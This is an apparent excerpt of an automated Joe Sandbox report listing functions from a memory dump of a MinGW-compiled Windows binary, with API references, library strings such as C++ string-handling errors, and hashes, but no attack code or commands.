Instruction ID: 0026329a8a0fcd88d0a7194c82e7bba91ded2afdc8ad0761b4b91bb4e5e87678
Opcode Fuzzy Hash: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction Fuzzy Hash: E701C46292C607B6EA157F555844238F1A1AF88724FE41630CA3B093E0DE3DA488E334

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA8980 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF738DA89A0
fprintf.MSVCRT ref: 00007FF738DA89BF
GetCurrentThreadId.KERNEL32 ref: 00007FF738DA89D5
fprintf.MSVCRT ref: 00007FF738DA89FC

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00007FF738DA89E3
C%p %d %s, xrefs: 00007FF738DA89AE

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 1384477639-884133013
Opcode ID: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction ID: fd6a94e6b783e4dfd4519dde6b62846b66349d412ac26f76af4b1c73685a5891
Opcode Fuzzy Hash: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction Fuzzy Hash: 080180B3E18706E5EA11AF25E840469B7A4FB88BD4F988131DE4D93354EF3CE445DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F160 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF738D9F1A0
calloc.MSVCRT ref: 00007FF738D9F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF738D9F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF738D9F1E9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF738D9F192
!dso || dso == &__dso_handle, xrefs: 00007FF738D9F199

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction ID: cc7cb7b9dd701249c59d4b67f67139cdd80cc8d9f268419fc4f7a929abc3de4e
Opcode Fuzzy Hash: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction Fuzzy Hash: 70011BA6A2D607B1FB51AF55E8441B5A3B6AF48780FC44074C90C87390EE3DE989E764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9CDF0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230COMMON

Download Yara Rule

Strings

default arg#, xrefs: 00007FF738D9CFEB
{, xrefs: 00007FF738D9CFF2
}, xrefs: 00007FF738D9D0F0
}::, xrefs: 00007FF738D9D0E9
:, xrefs: 00007FF738D9CF06

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: :$default arg#${$}$}::
API String ID: 0-1396675520
Opcode ID: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction ID: 7c88aa114e45c78e3b3bd46a03d331ec6ff48edb5c4f53d06c5f73b00c65315a
Opcode Fuzzy Hash: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction Fuzzy Hash: 2F91C873A0868297E7699E25A4003FEE351EB09798F884035CF9E07785DF7EE485E314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F6C0 Relevance: 9.0, APIs: 6, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF738D9F6CA
FormatMessageA.KERNEL32 ref: 00007FF738D9F70B
IsDebuggerPresent.KERNEL32 ref: 00007FF738D9F715

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID:
API String ID: 2392558662-0
Opcode ID: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction ID: 7d06cbd2fa7c3681cf63aefc9a32c12d5e1bbf16daf5c4a675e8a1f71f6cc7ae
Opcode Fuzzy Hash: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction Fuzzy Hash: 930186A2B1CA03A2E750AF15FC54329E371BF88B84F941034DA4D86664EF3DD444D714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA7A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF738DA7A70
GetCurrentThreadId.KERNEL32 ref: 00007FF738DA7A9D
printf.MSVCRT ref: 00007FF738DA7AD5

Strings

RWL%p %d %s, xrefs: 00007FF738DA7A7C
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 00007FF738DA7AAB

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CurrentThread$printf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 2165381015-1971217749
Opcode ID: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction ID: f6fe837e47fad1bfb7ec6659d2235a56f3c2d699ff119b73153dff684bdfad87
Opcode Fuzzy Hash: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction Fuzzy Hash: FC01C073A18A06A6EB11AF15E80476AB7A0AB88B98F984030DE0D83344EF3DD4499B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA8E10 Relevance: 7.7, APIs: 5, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF738DA7560: WaitForMultipleObjects.KERNEL32 ref: 00007FF738DA75D4

ResetEvent.KERNEL32 ref: 00007FF738DA8E77
WaitForSingleObject.KERNEL32 ref: 00007FF738DA8EF0

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID:
API String ID: 256776027-0
Opcode ID: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction ID: 13aefde5d98967381068215b641d300837fd0dbe2f98150d20b31c13099a121b
Opcode Fuzzy Hash: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction Fuzzy Hash: 88514913E2C003B1FA607666944577AC1A27F88794FF40431DE1E8A3D1EDBFE949B269

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBEC70 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF738DBEC82
memcpy.MSVCRT ref: 00007FF738DBECD4
memcpy.MSVCRT ref: 00007FF738DBED90

Strings

basic_string::append, xrefs: 00007FF738DBED2A, 00007FF738DBEDE8

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction ID: d5813a98c85b3b23b75688b10e55554c2b12f11cc63f608a0aa5960e5e7c60f7
Opcode Fuzzy Hash: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction Fuzzy Hash: ED51BE63A28A45B0EE16EB16C4045BDE321FB49BC4BD88632DE1D473D0EE3EE449D318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBBAC0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 158stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DBBAD2
memcpy.MSVCRT ref: 00007FF738DBBB22
memcpy.MSVCRT ref: 00007FF738DBBBDD

Strings

basic_string::append, xrefs: 00007FF738DBBB7D, 00007FF738DBBC3B

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction ID: 77384d91b0119f33596db7ff5af1cc18a98e9b506716a29bfb88124d82971005
Opcode Fuzzy Hash: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction Fuzzy Hash: 6451026362864AB4DE22FA25C458579E360FB49BC0FC84532ED6E47391DE3ED444E318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC0290 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147COMMON

Download Yara Rule

Strings

string::string, xrefs: 00007FF738DC0428
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DC0388, 00007FF738DC03DF, 00007FF738DC042F
basic_string::_M_create, xrefs: 00007FF738DC0337
basic_string::basic_string, xrefs: 00007FF738DC0381, 00007FF738DC03D8

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction ID: d1ff66bbf68c26b0dc5d910e27799440a0aa99e4367d7deee6fffb2b876e220c
Opcode Fuzzy Hash: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction Fuzzy Hash: 6C41C273B15B46A5EA00AF29D4404ACE370EB18FA8BD45632CA5D073A0EF3DE59AD354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC0750 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147COMMON

Download Yara Rule

Strings

string::string, xrefs: 00007FF738DC08E8
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DC0848, 00007FF738DC089F, 00007FF738DC08EF
basic_string::_M_create, xrefs: 00007FF738DC07F7
basic_string::basic_string, xrefs: 00007FF738DC0841, 00007FF738DC0898

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction ID: a1bc7483d3a49f4d676756293f2f3016611008816952dd82b34ab30553906eb8
Opcode Fuzzy Hash: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction Fuzzy Hash: D441D573B15B46B4EA04AF29D4404ACE370FB28FA8BD45632CA5D03390EE3DD59AD394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA0640 Relevance: 7.6, APIs: 5, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction ID: add9e65b0c345a246486f3bbd3a3d64b95a8c634172b2b5a1108b625308e9269
Opcode Fuzzy Hash: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction Fuzzy Hash: 6D411C23B28213A6FA65FB15A80873BD195EF48394FA84035DD1C4A3C0EE7DEC88D764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA04E0 Relevance: 7.6, APIs: 5, Instructions: 102threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF738DA0520

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction ID: d7f5739213102890ba3f6554ba3bcaaa0b5a6762167e480c69e7f9f876db86f7
Opcode Fuzzy Hash: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction Fuzzy Hash: EB31C933F19113D6FB55AB14A84872AA195EF48790FA54434DE0C8A3C0FE3EDC89E764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA52D0 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF738DA52E5

Part of subcall function 00007FF738DA2D40: TlsGetValue.KERNEL32 ref: 00007FF738DA2DA0

SetLastError.KERNEL32 ref: 00007FF738DA5322
realloc.MSVCRT(00000000,?,?,00007FF738D914F6,00007FF738DA02FB,000001FAF80A5C40,00000000,00007FF898063CA0,00007FF738D932FA), ref: 00007FF738DA5353
realloc.MSVCRT(00000000,?,?,00007FF738D914F6,00007FF738DA02FB,000001FAF80A5C40,00000000,00007FF898063CA0,00007FF738D932FA), ref: 00007FF738DA5367
memset.MSVCRT ref: 00007FF738DA539D

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: ErrorLastrealloc$Valuememset
String ID:
API String ID: 2591390167-0
Opcode ID: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction ID: 9cb108fecd7d64a18fe8e203949d48bca255308316d23b9bbadc104169f6c24c
Opcode Fuzzy Hash: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction Fuzzy Hash: 1F21C427B25601A5EF15BF3AA84056DE3A5EF48B94F950031DD0E0B391ED3DD889D394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA8880 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF738DA8898
